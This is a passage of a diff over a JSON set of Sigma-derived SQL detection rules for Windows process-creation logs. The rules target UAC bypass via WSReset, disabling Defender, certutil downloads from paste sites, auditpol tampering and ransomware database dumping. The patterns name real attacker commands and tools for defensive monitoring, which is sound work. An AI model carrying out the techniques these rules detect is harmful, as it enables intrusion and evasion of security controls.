Which is fairly uncommon and could indicate potential suspicious activity", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use to pass password to different powershell commands" + "Unknown sub processes of Wsreset.exe" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%ConvertTo-SecureString%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" ], - "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml" + "filename": "proc_creation_win_uac_bypass_wsreset.yml" }, { - "title": "Potential PlugX Activity", - "id": "aeab5ec5-be14-471a-80e8-e344418305c2", + "title": "DumpStack.log Defender Evasion", + "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", "status": "test", - "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.s0013", - "attack.defense_evasion", - 
"attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((((((((((NewProcessName LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security 
Essentials\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" + "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" }, { - "title": "Tasks Folder Evasion", - "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "title": "New Port Forwarding Rule Added Via Netsh.EXX", + "id": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", "status": "test", - "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", - "author": "Sreeman", + "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel", "tags": [ + "attack.lateral_movement", "attack.defense_evasion", - 
"attack.persistence", - "attack.execution", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity", + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%interface%' ESCAPE '\\' AND CommandLine LIKE '%portproxy%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%v4tov4%' ESCAPE '\\') OR (CommandLine LIKE '%i %' ESCAPE '\\' AND CommandLine LIKE '%p %' ESCAPE '\\' AND CommandLine LIKE '%a %' ESCAPE '\\' AND CommandLine LIKE '%v %' ESCAPE '\\') OR (CommandLine LIKE '%connectp%' ESCAPE '\\' AND CommandLine LIKE '%listena%' ESCAPE '\\' AND CommandLine LIKE '%c=%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_netsh_port_forwarding.yml" + }, + { + "title": "Audit Policy Tampering Via Auditpol", + "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "status": "test", + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "falsepositives": [ + "Administrator or administrator scripts might leverage the flags mentioned in the detection section. 
Either way, it should always be monitored" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_task_folder_evasion.yml" + "filename": "proc_creation_win_auditpol_susp_execution.yml" }, { - "title": "Sofacy Trojan Loader Activity", - "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "title": "Potential Commandline Obfuscation Using Escape Characters", + "id": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", "status": "test", - "description": "Detects Trojan loader activity as used by APT28", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects potential commandline obfuscation using known escape characters", + "author": "juju4", "tags": [ - "attack.g0007", - "attack.execution", - "attack.t1059.003", "attack.defense_evasion", - "car.2013-10-002", - "attack.t1218.011" + "attack.t1140" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' 
ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%h^t^t^p%' ESCAPE '\\' OR CommandLine LIKE '%h\"t\"t\"p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_sofacy.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_escape_char.yml" }, { - "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", - "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "title": "PUA - Nimgrab Execution", + "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", "status": "experimental", - "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", + "author": "frack113", + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], "falsepositives": [ - "Unknown" + "Legitimate use of Nim on a developer systems" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = 
'2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" ], - "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" + "filename": "proc_creation_win_pua_nimgrab.yml" }, { - "title": "HackTool - Impersonate Execution", - "id": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", - "status": "experimental", - "description": "Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis", + "title": "Suspicious File Download Using Office Application", + "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "status": "test", + "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%impersonate.exe%' ESCAPE '\\' AND (CommandLine LIKE '% list %' ESCAPE '\\' OR CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% adduser %' ESCAPE '\\')) OR ((Hashes LIKE '%MD5=9520714AB576B0ED01D1513691377D01%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A358FFC1697B7A07D0E817AC740DF62%' ESCAPE '\\') OR md5 = '9520714AB576B0ED01D1513691377D01' OR sha256 = 'E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A' OR Imphash = '0A358FFC1697B7A07D0E817AC740DF62')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE 
'%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impersonate.yml" + "filename": "proc_creation_win_lolbin_office.yml" }, { - "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", - "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "title": "Potential Conti Ransomware Database Dumping Activity", + "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", "status": "test", - "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command used by conti to dump database", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Legitimate software creating script event consumers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" }, { - "title": "Potential Ke3chang/TidePool Malware Activity", - "id": "7b544661-69fc-419f-9a59-82ccc328f205", - "status": "test", - "description": "Detects registry modifications potentially 
related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", - "author": "Markus Neis, Swisscom", + "title": "Disable Windows Defender AV Security Monitoring", + "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "status": "experimental", + "description": "Detects attackers attempting to disable Windows Defender using Powershell", + "author": "ok @securonix invrep-de, oscd.community, frack113", "tags": [ - "attack.g0004", "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" + ], + "filename": 
"proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" + }, + { + "title": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe", + "id": "65d2be45-8600-4042-b4c0-577a1ff8a60e", + "status": "test", + "description": "Detects defence evasion attempt via odbcconf.exe execution to load DLL", + "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1218.008" + ], + "falsepositives": [ + "Legitimate use of odbcconf.exe by legitimate user" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR OriginalFileName = 'odbcconf.exe') AND (CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%-f%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%/f%' ESCAPE '\\' OR CommandLine LIKE '%regsvr%' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE'))))" ], - "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" + "filename": "proc_creation_win_odbcconf_susp_exec.yml" }, { - "title": "Suspicious CodePage Switch Via CHCP", - "id": "c7942406-33dd-4377-a564-0f62db0593a3", + "title": "Shadow Copies Creation Using Operating Systems Utilities", + "id": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", "status": "test", - "description": "Detects a code page switch in command line or batch scripts to a rare language", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Shadow Copies creation using operating systems utilities, possible credential access", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.t1036", - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003", + "attack.t1003.002", + "attack.t1003.003" ], 
"falsepositives": [ - "Administrative activity (adjust code pages according to your organization's region)" + "Legitimate administrator working with shadow copies, access for backup purposes" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '% 936' ESCAPE '\\' OR CommandLine LIKE '% 1258' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_chcp_codepage_switch.yml" + "filename": "proc_creation_win_susp_shadow_copies_creation.yml" }, { - "title": "Potential NTLM Coercion Via Certutil.EXE", - "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", - "status": "experimental", - "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "LOLBIN Execution Of The FTP.EXE Binary", + "id": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "status": "test", + "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", + "author": "Victor Sergeev, oscd.community", "tags": [ + "attack.execution", + "attack.t1059", "attack.defense_evasion", - "attack.t1218" + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% 
-syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\' OR ((NewProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\' OR OriginalFileName = 'ftp.exe') AND CommandLine LIKE '%-s:%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certutil_ntlm_coercion.yml" + "filename": "proc_creation_win_lolbin_ftp.yml" }, { - "title": "HackTool - DInjector PowerShell Cradle Execution", - "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "title": "Rundll32 JS RunHTMLApplication Pattern", + "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", "status": "test", - "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", + "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_dinjector.yml" + "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" }, { - "title": "Application Whitelisting Bypass via PresentationHost.exe", - "id": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", + "title": "Active Directory Structure Export Via Ldifde.EXE", + "id": "4f7a6757-ff79-46db-9687-66501a02d9ec", "status": "experimental", - "description": 
"Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", + "description": "Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.exfiltration" ], "falsepositives": [ - "Legitimate \".xbap\" being executed via \"PresentationHost\"" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND CommandLine LIKE '%.xbap%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND CommandLine LIKE '%-f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_presentationhost.yml" + "filename": "proc_creation_win_ldifde_export.yml" }, { - "title": "Import PowerShell Modules From Suspicious Directories - ProcCreation", - "id": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", + "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", + "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", "status": "experimental", - "description": "Detects powershell scripts that import modules from suspicious directories", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1027" ], 
"falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE 
